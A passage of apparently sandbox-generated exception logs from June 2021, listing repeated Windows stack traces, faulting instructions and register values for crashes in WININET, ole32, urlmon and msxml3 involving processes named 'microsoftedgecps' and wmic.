__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 78445524 registers.edi: 0 registers.eax: 1 registers.ebp: 78445772 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 78445484 registers.edi: 0 registers.eax: 1 registers.ebp: 78445732 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:51 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 78445484 registers.edi: 0 registers.eax: 1 registers.ebp: 78445732 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 9499820 registers.edi: 7395436 registers.eax: 9499820 registers.ebp: 9499900 registers.edx: 53 registers.ebx: 9500184 registers.esi: 2147746133 registers.ecx: 7169392	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6dd76f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6dd76e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6dd727a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6dd72652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6dd7253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6dd72411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6dd725ab wmic+0x39c80 @ 0x3b9c80 wmic+0x3b06a @ 0x3bb06a wmic+0x3b1f8 @ 0x3bb1f8 wmic+0x36fcd @ 0x3b6fcd wmic+0x3d6e9 @ 0x3bd6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2878432 registers.edi: 1957755408 registers.eax: 2878432 registers.ebp: 2878512 registers.edx: 1 registers.ebx: 7139052 registers.esi: 2147746133 registers.ecx: 147762601	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 37286872 registers.edi: 6412252 registers.eax: 37286872 registers.ebp: 37286952 registers.edx: 53 registers.ebx: 37287236 registers.esi: 2147746133 registers.ecx: 6186136	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6dd76f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6dd76e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6dd727a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6dd72652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6dd7253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6dd72411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6dd725ab wmic+0x39c80 @ 0x99c80 wmic+0x3b06a @ 0x9b06a wmic+0x3b1f8 @ 0x9b1f8 wmic+0x36fcd @ 0x96fcd wmic+0x3d6e9 @ 0x9d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1173600 registers.edi: 1957755408 registers.eax: 1173600 registers.ebp: 1173680 registers.edx: 1 registers.ebx: 6155796 registers.esi: 2147746133 registers.ecx: 145607701	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 47641376 registers.edi: 5634132 registers.eax: 47641376 registers.ebp: 47641456 registers.edx: 53 registers.ebx: 47641740 registers.esi: 2147746133 registers.ecx: 5399704	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x6d556f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x6d556e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x6d5527a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x6d552652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x6d55253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x6d552411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x6d5525ab wmic+0x39c80 @ 0x799c80 wmic+0x3b06a @ 0x79b06a wmic+0x3b1f8 @ 0x79b1f8 wmic+0x36fcd @ 0x796fcd wmic+0x3d6e9 @ 0x79d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1500872 registers.edi: 1957755408 registers.eax: 1500872 registers.ebp: 1500952 registers.edx: 1 registers.ebx: 5369324 registers.esi: 2147746133 registers.ecx: 382665888	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 